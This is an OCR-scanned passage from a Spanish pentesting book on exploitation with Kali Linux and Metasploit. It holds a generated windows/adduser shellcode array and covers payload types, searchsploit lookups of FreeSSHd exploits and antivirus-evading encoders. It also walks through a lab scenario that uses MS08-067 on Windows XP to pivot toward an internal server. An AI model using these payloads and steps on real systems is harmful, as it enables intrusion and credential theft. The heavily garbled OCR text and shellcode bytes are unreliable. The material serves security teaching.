lenguajes  de  programacion  con  las  shellcodes  ya  generadas,  '  1 

root@root:~#  nsf  pay  load  windows/adduser  USER=i64  PASS=pabloglez  c”1  j 

/*  1 

*  windows/adduser  -  272  bytes 

*  http://www.metasploit.com  | 

*  EXITFUMC=process,  U5ER=i64,  PA55=pabloglez  1 

*/  m 

unsigned  char  buf [ 1  = 

’\xf c\xe8\x89\x00\x80\x88\x6B\x89\xe5\x31\xd2\x64\xBb\x52\x39“ 

■\x8b\x52\x9c\x8b\x52\xl4\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xf f"  j 

“\x31\xc0\xac\x3c\x6i\x7c\x82\x2cVx28\xcl\xcf\x8d\x01\xc7\xe2* 

"\xf0\x52\x57\x8b\x52\xlfl\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85*  ,'J 

■\xc0\x74\x4a\x01\xdB\xM\xBb\x48\xlB\x8b\x58\x20\x81\xd3\xe3*  ,1 

’\x3c\x49\x8b\x34\xBb\x01\xd6\x31\xff\x31\xc0\xac\xcl\xcf\x0d‘  J 

“\x01\xc7\x38\xe8\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"  > 

■\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\xlc\x01\xd3\x8b“ 
■\x84\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\xSa\x51\xff " 
*\xe0\x58\x5f\x5a\x8b\xl2\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00‘ 
*\x60\x@0\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56'‘ 

“\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\xB6\x7c\x8a\x80\xfb\xe0\x75"  J 

*\x05\xbb\x47\xl3\x72\xfif\x6a\x00\x53\xf f\xd5\x63\x6d\x64\x2e"  r 

“\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72M 

■\x2e\x69\x36\x34\x20\x70\x61\x62\x6c\x6f\x67\x6c\x65\x7a\x2B"  I 

*\x2f\x41\x44\x44\x28\x26\x26\x2fl\x6e\x65\x74\x20\x6c\x6f\x63"  j 

■\x61\x6c\x67\x72\x6f\x75\x70\x2B\X41\x64\x6d\x69\x6e\x69\x73'  ,1 

"\x74\x72\x61\x74\x6f\x72\x73\x26\x69\x36\x34\x20\x2f\x41\x44*  |  1 

Itnagen  04.01:  Geni-racidn  de  una  shellcode  en  lenguaje  C. 

Las  shellcodes  suelen  ser  de  tamafio  pequeno  para  poder  scr  inyectados  en  espacios  pequefios  de 
memoria,  como  puede  scr  dentro  de  un  marco  dc  pila.  Generalmente,  en  el  proceso  de  compilado  de 
la  shellcode  se  generan  bytes  nulos,  los  cuales  pueden  provocar  la  parada  de  la  ejecucion  del  codig0, 
Se  debe  tcncT  en  cuenta  ese  hecho  cuando  se  genere  este  tipo  dc  codigo, 
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windows /message  box 
windows/meterpreter/bind  ipvfi  tcp 
(Reflective  Injection),  filmt  TCP  stager  (IPv6) 
windows/meterpra ter/bind  nonx  tcp 
(Reflective  Injection),  Bind  TCP  Stager  (No  NX  or  win?) 

windows/swterpreter/ bind  tcp 
(Reflective  Injection),  Bind  TCP  Stager 
*  i  n  daws /met e  rp  re  t  e  r/  f ind_t  ag 
(Reflective  Injection),  Find  Tag  Ordinal  Stager 
windows/meterp reter/ reverse  http 


normal 

normal 


Windows  MessageBox 
Windows  Meterpreter 


normal  windows  Heterpreter 
normal  windows  tteterpreter 
normal  Windows  Heter prefer 
normal  Windows  Weterpreter 


image  n  04.02:  Ejcmplo  de  un  listado  de  pay  loads. 


Tipos  de  payloads 

Ex  is  ten  distintos  tipos  de  payloads,  los  cuales  se  enumeran  a  coniinuacion: 

Inline  o  Singles. 

-  Stagers, 

-  Staged 

5  9  * 

I  stos  diterentes  tipos  aportan  gran  versatilidad  y  son  de  gran  util idad  era  los  infinitos  eseenarios  a 
los  que  se  enfrenla  el  pen  tester. 

I  os  payload  de  tipo  single  son  codigo  uutonomo  que  solamente  realiza  una  tarea  concrete*  Por 
cjemplo  euando  el  exploit  inyeeta  el  payload  v n  memoria  y  este  se  ejecuta  otorgando  una  shell 
inversa  al  atacante,  afladiendo  un  usuario  al  sistema  o  mostrando  algun  tipo  de  mensaje  de  alerta  al 

usuario. 


Los  payload  de  tipo  stagers  son  los  encargados  de  crear  la  conexion  entre  el  atacante  y  ia  victima, 
son  ^1  paso  previo  a  la  descarga  de  todo  el  payload.  ^Por  que  es  neeesario?  Lxisten  payloads  con 
di  versus  func  ion  alidades,  como  puede  ser  interpreter,  Este  tipo  de  payloads  necesitan  crear  una 
conexion  con  la  maquina  vulnerada  y  despues  descargar  el  resto  del  cddigo  en  otra  zona,  por  lo  que 
los  payloads  de  tipo  stagers  son  los  utilizados  para  descargar  payloads  de  tipo  staged. 

ILos  payload  de  tipo  staged  se  descargan  y  son  ejecutados  por  los  de  tipo  stagers  y  normalmente 
son  usados  para  realizar  tareas  complejas  o  con  gran  variedad  de  funcionalidades.  En  otras  palabras 
los  de  tipo  staged  utilizan  pequenos  stagers  para  ajustarse  en  pequenos  espacios  de  memoria  donde 
resiizar  la  explotacidn.  La  cantidad  de  memoria  que  se  dispone  para  realizar  la  explotacion,  en  la 
^yoria  de  los  casos,  esta  limitada. 


.  tra  de  las  cosas  que  hay  que  tener  en  cuenta  euando  se  lista  los  distintos  payloads  es  la  propiedad 
^  trNX  y  NX-  El  NX  bit  es  una  caracterislica  de  los  procesadores  modemos  para  prevenir  ejecucidn 
e  c<)digo  en  cicrtas  areas  de  memoria.  Por  ejcmplo,  en  sistemas  Windows  NX  es  implementado 
c°mo  DER,  (Data  Execution  Prevention) <  Si  se  ve  csta  caracteristica  en  algun  payload  del  listado 
que  ese  codigo  esta  preparado  para  evadir  el  DEP.  Los  payloads  que  indican  IPv6  en  la  lista 
lean  que  estan  preparados  para  funcionar  en  redes  IPv6. 
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2.  Explotacion  en  Kali 

Kali  propordona  una  serie  de  herramicnta  interesatites  para  realizar  pruebas  de  pentesting  en  cl 
&mbito  profesional.  La  mis  conodda*  y  una  de  las  que  entra  en  el  top  10  de  herramientas  de  auditoria 
de  Kali  es  Metasplmt  Framework.  En  este  apartado  $e  hablara  de  distintas  herramientas  que  pueden 
resultar  de  utilidad  para  Ilevar  a  eabo  explotaciones  en  un  test  de  intrusion,  y  se  ejemplificarim 
mediante  pniebas  de  coneepto  y  escenarios*  para  que  ei  lector  disponga  de  ejemplos  que  pueda 
facilmente  reproducir. 


1 1 0-1 1  I.miiiir  I  If  r,|‘.T  ■  I  ■ 


Aiiqutl  Dim 


H  Inijinrtrl*  RlVfifR 

pru*bas  ifla  Stress 
^  ■  


>  d  rJp  DjWrt  4*  I.Kpliyti 

*  U  HprrflJTMiffitfl  InqflniS'-'j  Sotiji 

*  0  MitiipLoit 

>  Of  NctwnrI  T  irpLaititinn 


linagen  04,03:  Seccktnes  de  aplicaciones  para  la  cxplotacion  en  Kali  Linux . 


Base  de  datos  de  exploits 

En  la  seed  on  "Base  de  datos  de  exploits"  se  puede  encontrar  una  herramienta  denominada 
searchsploit,  Esta  aplicacion  es  un  script  cuyo  objetivo  es  realizar  busquedas  por  platafomias, 
aplieaeiones,  protocolos  y  localizar  los  exploits  que  se  disponen  en  la  distribution. 

La  aplicacion  no  es  mas  que  un  script  de  hash  tal  y  como  se  puede  visual izar  en  la  imagery  que 
dispone  de  un  ficheto  CSV  a  modo  de  base  de  datos,  Ademas,  existe  una  earpeta  denominada 
platform  que  alberga  los  exploits  que  se  pueden  encontrar  en  un  sitio  web  como  exploit-db . 


r  ntf  c [Ik ill  j  :  AimVMmt  *  1 1  •  I  »  [  i  dti#  cit  seanehspLoit 
f ! /bin/bawh 

*  e*ploitdb  CL  I  »*nreh  tool 
t  svpatha /u*r /she  re/*fcplelttJb/ files  .cSy 

U§AG£-  'Usage;  'u&sanome  $3'  [tfcr^i]  [  t v  nr.? ]  ftpni>3l \n£;j<flmp1  b  ;  ’  bes-enama  S3  ‘  orac 
se  in  the  search  terms;  seen-nd  antj  third  terms  are  optional. \n  basanome  $0"  will 
@  left  to  right  so  ordor  your  search  terms  accordingly  .\nU*  ;  'oracle  local,'  wtl 
al  oration" 

if  [  $#  eq  0  J;  then 

echo  -e  USAGE:  >&2 


I m agon  04.04:  CYidigo  tit*  S&trchsptaif. 
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Aparentemente  esta  aplicacidn  puede  ser  send  I  la  y  no  muy  productiva,  pero  real mente  es  todo  lo 
contraim  La  distribucidn  de  Kali  dispone  de  un  gran  numero  de  exploits  en  su  interior,  q Lie  quiza  no 
sean  eonocidos  debido  a  que  el  auditor  no  los  ha  utilizado  antes.  Gracias  a  esta  pequena  herramienta 
so  pueden  realizar  busquedas  de  exploits  en  funcion  de  un  pro  toco  lo,  plataforma,  version  de  producto 
que  se  requiem. 

Estruetura  de  Searchsploit 

La  ruta  donde  se  encuentra  el  script  es  'usr/share/expl oitdh ,  En  el  interior  de  dicha  ruta  se  puede 
encontrar: 

El  fichero files  xsv.  Este  fichero  eontiene  un  numero  linico  que  identifier  al  exploit,  la  ruta 
donde  se  encuentra  fisicamente,  la  descripcion,  la  fee  ha,  la  plataforma,  el  tipo  de  explotacion 
(local,  remota)  y  el  puerto.  Este  arehivo  realiza  las  funciones  de  base  dc  datos  donde  en 
funcion  de  los  parametros  de  enirada  de  searchsploit  se  buscaran  coincideneias  en  files.es v. 

-  El  directorio platform.  Este  directorio  eontiene  un  gran  numero  de  exploits  en  distintos 
lenguajes  dc  prog  ram  aci6nt  eomo  puede  ser  lenguaje  C  Ruby,  Python,  pruebas  de  concepto 
en  archivos  dc  texto,  scripts,  etcetera. 

-  El  fichero  searchsploit.  Este  tichero  es  ejecutable  y  eontiene  el  cuerpo  del  script  que  se 
lanza  y  realiza  las  busquedas  en  funcion  de  los  parametros  de  entrada. 

Ln  el  directorio  platform  se  pueden  enconlrar  del  orden  de  mas  de  22,000  exploits,  los  cuales  sc 
encuemmn  en  el  sit io  web  exploit-db.com.  El  penfesfer  antes  de  buscar  por  la  red  debena  buscar 
mediante  esta  aplicacidn  ya  que  muy  probablemente  disponga  de  un  exploit  para  lo  que  necesita. 
Hay  que  tener  en  cuenta  que  tener  esta  aplicacidn  actualizada  puede  no  ser  tarea  sencilla,  pero  es  una 
herramienta  bastante  util  para  llevar  a  cabo  busquedas  de  exploits  en  un  momento  dado. 


Busqueda  de  exploits  con  Searchsploit 

En  este  apartado  sc  va  a  expliear  una  busqueda  con  Searchsploit,  El  resultado  dc  las  busquedas  son 
rutas  donde  se  encuentran  exploits  que  satisfaccn  los  patrones  de  busqueda  que  se  pasaron  a  la 
aplicae ion  Todo  exploit  se  encuentra  en  el  interior  de  la  caipeta/?/a#&m,  que  a  la  vez  dispone  de  otras 
Subcarp  etas.  Por  esta  razon  es  interesante  obtener  la  ruta  completa  donde  se  aloja  definitivamente  el 
exploit  a  traves  de  dicha  herramienta. 


e  Pc>dra  observar  que  la  nomenc latum  que  utiliza  exploii-dh  para  almacenar  los  exploits  es 
tolmcnte  numerica,  Por  ello,  el  fichero  filesxsv  indica  el  nombre  del  fichero  y  la  descripcidn  real, 
<lue  solo  por  el  nombre  del  fichero  no  se  consigue  gran  infbrmacidn. 


n  sigtiiente  ejemplo  sc  utiliza  la  siguiente  instmecidn  searchsploit  freesshd  windows.  Como  sc 
l_  e  v  1  I  tzar  la  s intax  is  dc  la  ap  I  icacion  es  sencil  I  a  searchsploit  patron  I  f patron  2] , . .  [patron  NJ. 

*  sdlitifl  obtctiida  por  esta  primers  busqueda  son  todos  los  exploits  que  se  encuentran  enumerados  en 
■Pmero files. csv  que  coinciden  con  los  patrones  indicados.  A  mayor  numero  de  patrones  indicados 
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mas  selectiva  es  la  busqueda  de  exploits,  por  lo  que  sc  recomieruia  utilizar  siempre  patrones  como 
piataforma,  protocolo  o  producto  si  es  conocido  por  el  pentester .  l 


r  a  niff  »f  ^ri'TT /iKi1  w  se  3  r?  n  g  r  .  *.  i  i  ? in  v qn  a  u:  n  n  bus- 

Dysc  rip  lion 


Path 


f  reaSSHd 
f  reaSSHd 
f  raoSSHd 
f  resSSHd 
f  reeSSHd 
=rBe5SHa 
:  reeSSHD 
F  reeSSKd 
h  reeSS-hd 
■ reeSSHD 
" ressshd 


<=  1,0.9  Key  Exchange  Algorithm  Buffer  Overflow  Exploit 

1,2.1  Remote  Stack  Overflow  PoC  [auth) 

1.2.1  (Post  Auth)  Remote  5EH  Overflow  Exploit 

1.2.1  sftp  rename  Remote  Suffer  Overflow  PoC  {auth) 

1.2.1  sftp  real  path  Remote  Buffer  Overflow  PoC  [auth) 

1.2.1  (rename)  Remote  Suffer  Overflow  Exploit  (SEHJ 
1,2.3  Remote  Buffer  Overflow  DoS 

1.0.9  Key  Exchange  Algorithm  String  Buffer  Overflow 
Crash  PoC 

Remote  Authentication  Bypass  Zeroday  Exploit 
Authentication  Bypass 


/wi ndowf / remote/ 1 787 .py 
/w i ndows / d 03/5  709.pl 
/windows/ remote/5751 .pi 
/windows /dos/CSOO .pi 
/windows/dos/6812 .pt 
/win  dows/ rsm  ot a/fl  295.pl 
/windows/ dtas/  11S32 ,  py 
/windows/ remote/ 16461 .rb 
/ windows/ doe/ 1 S268 .txt 
/wi ndows/ remote/ 23880. txt 
/windows/ remot e/24 133 . rb 


Imogen  04.05:  Busqueda  du  exploits  realized  a  con  searchsploit. 


Otra  busqueda  imeresante  es  por  el  tipo  del  exploit,  cs  decir,  si  es  un  exploit  local  o  de  ejecucion 
remota.  En  un  momento  dado  el  pentester  puede  necesilar  un  exploit  local  para  devar  privilegios  en 
un  sistema  Microsoft  Windows.  Por  esta  razon  una  busqueda  interesante  seria  acotar  la  busqueda  a 
exploits  locales,  simplemcnte  introducicndo  el  patron  local  en  la  ejecucion  de  la  aplicacion. 


r«®t|k«H*/usr /'rhdr r /rjtpld  1  nib#  aeardisplelt  windows  local 

Desc  ript  ion 

Path 

MS  Windows  KP  texplorer.exe)  Suffer  Overflow  Exploit 

ICO  Pro  2803®  Password  Bypass  exploit  [cal -icq . asm) 

}®meWare  Mini  Remote  Control  Server  SYSTEM  Exploit 

MS  Windows  ( List  Box / CamboSox  Control)  Local  Exploit  (MS93  045) 

=1 rst Class  Desktop  7.1  [latest)  Buffer  Overflow  Exploit 
kS  Windows  Utility  Manager  Local  SYSTEM  Exploit  (MS04-011) 
tfinZIP  MIME  Parsing  Overflow  Proof  of  Concept  Exploit 

/  wi  ndows  A  oc  el  /  32 .  c 
/win  dows  A  oc  al  /  52  ♦  a  a  m 
/win  flows  A  oe*l/79  ,c 
/wlndowa/local/122  .c 
/windows/local  /  1 72 ,  c 
/windDwsAocel/271  ,c 
/windows/! oc al/272 .c 

Tmagcn  04.06:  Busqueda  de  exploits  locales  con  searchsploit ♦ 


Metaspioit 

Es  ei  nombre  que  recibe  el  proyecto,  open  source,  sobre  seguridad  iiiformatica.  Esle  proyecto  lacilua 
el  trabajo  al  auditor  proporcionando  informacion  sobre  vulnerabilidades  de  seguridad.  ayudando  a 
explotarlas  en  los  procesos  de  pentesting  o  test  de  intrusion.  E!  subproyecto  mas  famoso  que  dispone 
es  Metaspioit  framework ,  o  simplemente  denoniinado  Metaspioit.  E  ate  framework  es  un  conjunto  dej 
herraraientas  con  las  que  el  auditor  puede  desarrollar  y  ejecutar  exploits  y  lanzarlos  contra  maquinas 
para  comprobar  la  seguridad  de  estas.  Otras  de  las  funcionalidades  que  apoita  es  un  archivo  de 
shelleodes,  herramiemas  para  recolectar  informacion  y  escanear  en  busca  de  vulnerabilidades.  8 


En  Kali  Linux  Metaspioit  es  una  de  las  aplicaciones  Top.  como  se  puede  untender  rapidamente  al 
consu liar  el  apartado  de  “Top  10  Security  Tools".  En  la  ruta  /usr/share/metasploit-framework  so 
encuentra  distribuido  el  framework.  En  esta  ruta  se  pueden  visualizar  los  binarios  del  tipo  nisf ,  qu^S 
son  las  herramientas  que  aportan  distinta  funcionalidad  al  framework  como:  I 


Linea  de  comandos  para  interactuar  con  Metaspioit. 
Interfax  grafica  para  interactuar  con  Metaspioit. 
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Genera  cion  de  payloads. 

Ofuscacion  de  los  payloads  mediante  encoders. 

-  Analisis  de  binarios. 

El  directorio  modules  proportions  todos  los  exploits,  payloads ,  encoders,  modulus  de  tipo  auxiliary, 
fWps  y  post  del  framework^  por  lo  que  si  se  requiere  actualizar  el  mi  mere  de  exploits  o  de  Los  olros 
modules  se  debe  anadir  en  dichas  carpetas. 

Ln  estructura,  por  ejemplo,  de  la  carpeta  exploits  se  corresponde  con  la  manera  de  interactuar  luego 
con  los  modulos  en  la  linea  de  eomandos,  HI  primer  nivd  dentro  de  la  carpeta  exploits  se  corresponde 
con  la  plataforma  o  tipo  de  plata  formas  para  et  que  se  desaiTollo  el  exploit .  El  segundo  nivel  indica 
d  protocolo  o  producto  para  el  que  se  implements  d  exploit,  y  por  ultimo  se  encuentra  el  archivo  en 
Ruby ,  el  cual  es  el  modulo  del  exploit, 

Por  otro  lado  los  modulos  son  una  pieza  o  bloque  de  codigo  que  implementa  una  o  varias 
funcionalidades.  como  puedc  ser  la  ejecucion  de  un  exploit  conereto  o  la  realizacion  de  un  escaneo 
sobre  maquinas  remotas.  Los  modulos  que  componen  framework  son  el  nucleo  de  Metasploit  y 
los  que  hacen  que  sea  tan  podcroso.  Estos  pueden  ser  desarrollados  por  los  usuarios  y  de  esta  manera 
ampliar  el  framework  de  manera  personalizada,  y  en  funcion  de  las  necesidades  del  auditor 

La  mta  de  los  binaries  msf  se  encuentra  en  la  variable  SPATH  por  lo  que  simplemente  lanzandolos 
desde  la  linea  de  eomandos  se  pueden  ejecutar,  independientemente  de  la  ubicacidn  donde  se 
encuentre  el  usuario.  A  continuaeion  se  muestra  una  tahla  a  modo  dc  resumen  de  los  binarios  mas 
importantes  del  framework 


Binariu 

De$cripci6n 

msf  console 

Linea  de  eomandos  de  Metasploit  que  permite  ejecutar  modulos  y  realizar 
diversas  aeciones  en  un  test  de  intrusion. 

tnsfcli 

lnterfaz  que  permite  lanzar  un  modulo  concrete  mediante  su  conflguracion  en 
misma  ejecucion  de  la  aplieaciom 

msfgui 

lnterfaz  grafica  para  realizar  las  mismas  aeciones  que  eon  msfconsole. 

msfd 

Servicio  que  queda  a  la  escucha  pendiente  de  recibir  conexiones  para  ofrecer 
una  linea  de  eomandos  en  remote. 

fysJbifiscQFi 

Permite  realizar  busquedas  en  ejecutables,  tan  to  como  busquedas  dc 
instrucciones  de  sal  to,  instrucciones  POP,  etcetera, 

tnsfpescun 

Permite  realizar  un  analisis  sobre  DLLs  y  obtener  la  direccion  de  retomo 
deseada  para  que  la  shellcode  se  ejecute  como  se  espera. 

npf pay  load 

Permite  generar  shellcodes  en  distintos  lenguajes  de  programacidn,  c  incluso 
embeberlas  cn  ej  ecu  tables  de  windows  o  binarios  de  UNIX, 

wsfettcode 

Pennite  ofuscar  cl  codigo  de  la  shell  code  provocando  que  los  AVs  o  I  OS  o  los 
detecten. 
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Blnario 

Descripcidn 

msj  venom 

Esta  utilidad  es  el  resultado  de  la  union  entre  msf  encode  y  rmjpaytoad ’ 

msfupdate 

Permiie  actual  izar  el  framework^  mcluyendo  modules  y  funeionalidades* 

Tabhi  04.01 :  resumen  dc  los  bmados  mis  imporumies  de  Mvtasphi! 


Proof  Of  Concept:  Pivote  +  ODay  =  Owned! 

A  finales  del  ano  2012  se  descubrid  un a  vu  lnerabilidad  en  la  apiicacion  FreeSSlfd,  la  cual  a  mediados 
del  ario  2013  sigue  siendo  una  vulnerabilidad  de  lipo  Oday.  Existe  un  gran  numero  de  aplicaciones  que 
no  son  de  ambito  general,  es  deeir*  no  son  conocidas  por  la  mayoria  de  ios  usuarios  de  la  infomiatica, 
pero  que  son  utilizadas  por  empresas  en  ei  miindo  laborai.  Al  no  tratarse  de  aplicaciones  como  Java 
o  Adobe  Reader  hacen  que  sus  des  and  l  adores  vivan  en  un  mundo  mas  tranquilo,  s  implement  por 
el  hecho  de  no  tener  la  pres  ion  de  parchear  iras  el  descubrimiento  de  una  vulnerabilidad  critiea. 

FreeSSHd  cs  un  sencillo  servidor  SSH  para  equipos  Microsoft  Windows.  Esle  servidor  permiie 
gestionar  sesiones  de  shell  y  gestion  de  arehivos  de  forma  scgura  mediante  SFTP.  La  vulnerabilidad 
afecta  a  las  versiones  iguales  o  inferiores  a  la  1.2.6*  ^ 

El  escenario  presentado  es  el  refiejo  de  una  posible  situacidn  real  en  un  entomo  laborai  de  una 
empresa*  El  escenario  de  la  prueba  de  concepto  es  el  siguiente: 

-  Maquina  con  Windows  XPSP3  vulnerable  a  la  famosa  vulnerabilidad  MS08  067jtetapL 
Esta  maquina  dispone  de  dos  Larjetas  de  red*  la  primera  configurada  en  la  red  1 92,168.  KO/24 
y  la  segunda  configurada  en  la  red  10*0.0.0/8. 


Idapfc^idor  Ethernet  Conexion  de  Ai^ea  local 

■ 

ri- 

Suf ijo  de  conexion  especifica  DUE 

Dit*ecci6n  IP.  . . . 

192.168.1.40 

ttascArti  de  subbed  ........ 

255.255.255.0 

Puerta  de  enlace  predeterpiinada 

192.168.1.1 

Maptador  Ethernet  Conexidn  de  area  local  2  ~ 

Suf ijo  de  conexion  especifica  DMS 

Dii*eeeidn  IF.  ...  .  . 

10.0.0.1 

Mdseai^a  de  subved 

Puerta  de  enlace  ppedeteminada 

25S. 0.0.0 

Imagen  04,07:  Configu  radon  de  red  de  Windows  XF> 


-  Maquina  eon  la  distribution  de  Kali  Linux  y  Metasploit.  Esta  maquina  se  encuentra  en 
una  red  de  desarrollo,  en  la  red  192.168.  t  .0/24.  sin  conectividad  eon  la  red  10.0.0.0/8. 


footfkill;-#  ifconfig 

athG  Link  encap ; Ethernet  HWaddr  $8:00:27: f4: Be: If 

met  add r :  1 92 . 166  A  . 37  Beast : lft2. 1 68 . 1 , 255  Mask : 255  , 255 . 255 , © 
inetS  addr;  fefl0; ;a00;27f f ;fsf4:8elf/64  Scopo:Lmk 
UP  BROADCAST  RUNNING  MULTICAST  MTU: 1500  Metric:! 

RX  packets: 1065  errors;©  dropped :0  over  runs :0  frame :0 
T)C  packets:27  errors:G  dropped:©  overruns:©  carrier:© 
collisions:©  txqueuelen: 1©00 

RJC  bytes:l  143G5  (lll.fi  K1B)  TX  bytes:238B  C2.3  KiB) 


Imagen  04*0  8:  Configucacion  de  red  de  Kali  Li  mix. 


Ill 


nipitulo  IV*  Explorat  ion 


Maquina  Windows  7  con  la  aplicacion  FreeSSHd  imialada  en  el  equipo  en  ia  red 
10,0.0*0/8,  Se  entiende  que  la  maquina  Windows  7  cs  una  maquina  importante.  podria  ser  un 
servidor  critieo  sin  conectividad  con  3a  maquina  Kali  Linux. 


Adaptation  d«  Ethernet  Conexidn  de  Area  local: 

n 


Sufi  Jo  DNS  especificc  para  la 
Vinculo:  direct  1 in  IPv6  local. 
Direccidrt  IPv4,  ........ 

HAscara  de  subred  ....... 

Puerta  de  enlace  predeterm inada 


canex i6n,  ,  J 
,  ,  i  f  #B0 :  1 c  :  8a4 

10,0,0 , 


s2ea: aa0cxl 1 


255-0.0, 0 


Imagen  04.09:  Configuracion  de  red  de  Wfudmix  7, 


Dcsde  Kali  Linux  el  pentester  realizara  un  escaneo  de  servicios  y  versiones  sobre  las  maquinas 
con  las  que  se  dispone  de  conectividad.  Hi  objetivo  es  verificar  si  exists  alguna  vulnerabdidad,  ya 
sea  de  sistema  operative  o  alguna  aplicacion  que  se  ejecuta  en  esa  maquina.  ^Se  dispone  de  alguna 
credential  o  hash  de  Windows  para  intentar  impersonalizar  la  sc s ion  de  usuario?  Si  atm  el  pentester 
no  dispone  de  esta  infomiacion  habra  que  encorrtrar  una  via  mediante  ta  explotacion  de  alguna 
vulnerabdidad  o  la  intercepracion  de  informacion  sensible  en  la  red. 


Tins  analizar  la  maquina  XP,  con  la  que  se  dispone  de  conectividad  directa,  se  ohserva  que  puede 
ser  vulnerable  a  una  vulnerabitidad  de  2008  que  afecta  al  servicio  SMB.  Sin  nccesidad  de  que  el 
usuario  de  3a  maquina  XP  realice  ninguna  accidn  se  puede  obtener  el  control  remote  de  3a  maquina* 
Sc  utiliza  un  escaner  de  puertos  que  viene  incluido  como  modulo  de  iipo  auxiliary  en  Metasploit,  Hn 
la  imagen  se  puede  visual izar  la  configuracidn  que  se  realiza  del  modulo  y  como  se  detcctan  ciertos 
puertos.  HI  modulo  ulilizadoes  auxitiaiyfscmner/portscan/tcp. 


riaf  >  uiP  au  x  I,  l  id ry/sconn a  r/port  sc  on/ t  cp 
r-sf  flus.lllflryltr.pli  >  show  opt  Iona 

kodul®  options  (avxillary/'scennQr/pqrtstflr./l  cpf  ; 


Ns*nP 


Current  Setting  Reauired  Description 


CONCURRENCY  19 
PORTS  L- 19000 

RHD5TS 

THREADS  1 

TrMEOLTT  1009 


yes 

yes 

yes 

yes 

yes 


ual  auxiliary E tep] 

1H0STS  ->  132.163,1 
nsf  auxiliary  ( irp) 
aQPT£  =>  20  500 
nsf  auxiliary  (tep]  >  rvn 

’I  192.168 ,1 ,40:135  -  1  CP  OPEN 
1-1192.166.1,40:139  TCP  OPEN 

- 1  192.156,1 .40:445  TCP  OPEN 

( "|  Scanned  1  of  1  nosi*  [190%  complete] 
J"|  Auxiliary  module  execution  completed 
E&l  QJUliflryftcp)  >| 


The  number  of  concurrent  ports  to  check  per  host 
Ports  to  scan  [e.g.  72  25,80,110-900) 

The  target  Address  range  or  CIllR  ittentifmr 

The  number  of  concurrent  threads 

The  socket  connect  tir’adut  in  milliseconds 


>  set  3HQ5T5  192 .169,1,40 
40 

>  set  PORTS  20  500 


Imager  04,10;  Conti  guracidn  y  ejecucidn  <le  portscatt  eonini  hi  miquma  XV. 


^  puede  visualizar el  lamoso  puerto  445,  yes,  i  am  smh!  T  Si  sc  disponen  de  credenciales o  hashes 
usuario  de  Windows  se  podria  intentar  subir  un  payload  a  traves  de  dicho  servicio  autenticandose 
en  equipo h  En  csta  prueba  de  concepto  se  utilizari  el  famoso  MS08  067jtetapL 

l,bliza  el  modulo  auxi liary/scanner/sm b/srn h  version  para  verificar  rapidameme  que  tipo  de 
eqtiipo  cs  c|  qUe  se  acaba  de  escanear. 
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Se  obtiene  informacion  inieresante  conic  puede  ser: 

-  Version  del  sisiema  operativo  y  Service  Pack.  I 

-  idioma  dc  la  version  del  sistema operativo.  Este  dato  es  importante en  versiones  anteriores 

a  Windows  Vista  y  2008,  j 

-  Nombre  de  la  miquina  y  dominio. 

33  f  auiiUaryltcp]  >  us@  tu*Tl ta  ry/wtann* v7*mfa/a*b jhi r»ion 

msf  auxiliary  (sub  version)  >  show  options 

Module  options  ( au  xii  la  ry  ^  sc  an, ner/ss!ib/snb_  version)  : 

NSITIQ 


RHOSTS 
SMB Domain 
SMBPass 
SMBLisor 
THREADS 

fflsf  aux  ill  aryl*  wto  version)  ;>  set  RHOSTS  192,169.1.40 

RHDSTS  =>  192 . IGH .1,4® 

ms f  auxiliary [subversion)  >  run 

j  *  |  192, 160. I. 40 :44b  is  running  Windows  XP  Service  Pack  3  (language:  Spanish  J  (name  :PRJEBAb-0l7S0CC)  ( domain  :GRL^ 

P0  TRABAJD) 

1*1  Scannefl  1  of  1  hosts  (100%  complete) 

[ml  Auxiliary  module  execution  complatsd 

tnsl  auxiliary [hWb  version)  >  j  - — - — 

Imagcn  04.1 1 :  Obtenci6n  dc  informacion  sobre  cl  equipo  media  me  s nth  version,  I 

A  continuacidii  se  lanza  el  exploit  para  la  vulnerabilidad  MS08()6 7_netapi ,  En  la  imagen  sc  puede 
visualizar  la  inyeccion  del  Meterpreter  tras  aprovechar  la  vulnerabilidad  y  se  consigue  el  control 
total  de  la  maquina  remola. 


Imagen  U4.12:  Explotacidn  dc  Windows  XP \ 

En  este  instante  se  debe  explorar  ei  equipo  vulnerado  en  busca  de!  maxima  de  i  ntonnacion*  corno 
puede  ser: 


Current  Sotting  Required  Description 


'WORKGROUP 


yes 

ng 

na 

no 

yes 


The  targat  address  range  or  CIDR  identifier 
The  Windows  domain  to  use  for  authentication 
The  password  for  the  specified  username 
The  username  to  authentic  at  0  as 
The  number  of  concurrent  threads 


Capitulo  1 V.  Explotacion 
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-  Configurackin  tie  red,  Se  pueden  descubrir  nuevas  redes  o  analizando  el  trafieo  que 
circula  por  I  os  posibles  adaptadores  de  red  encontrar  maquinas  con  las  que  no  se  dispone  de 
conectividad  y  que  pueden  ser  criticas, 

.  Volcado  de  usuarios  almaeenados  en  la  SAM.  Si  la  maquina  fuera  un  Domain  <  'ontrotler 
se  podria  oblener,  siempre  y  cuaado  se  tuvieran  privilcgios.  un  volcado  de  usuarios  del 
dominie,  eon  lo  que  la  auditoria  interna  de  red  acabaria  ya  que  se  obtendria  aceeso  complete. 
Con  estos  usuarios  se  podria  realizar  impersonal izacicin  de  eslos  en  otras  maquinas  Windows 
de  la  red. 

-  Informacion  global  de  la  maquina,  mediante  la  ejeeucion  de  scripts  como  scraper  o 
winenum, 

Utilizar  la  maquina  vulnerada  como  pivote  para  disponer  de  conectividad  con  otras 
maquinas. 

-  Busqueda  de  credenciales  cacheadas  en  la  maquina  mediante  la  uti  lizacion  de  herramientas 
como  Mimikutz  o  WCE  en  la  maquina  remota. 

\)m  de  las  primeras  acciones  a  realizar,  como  se  menciona  anteriormente,  es  invesligar  la 
eonfiguraeidn  de  la  red  en  la  maquina  vulnerada,  ya  que  se  pueden  encontrar  nuevas  maquinas 

mte  res  antes. 

]  n  hi  i magen  se  puede  visual izar  como  la  miquina  XP  dispone  de  dos  adaptadores  de  red,  uno  en  la 
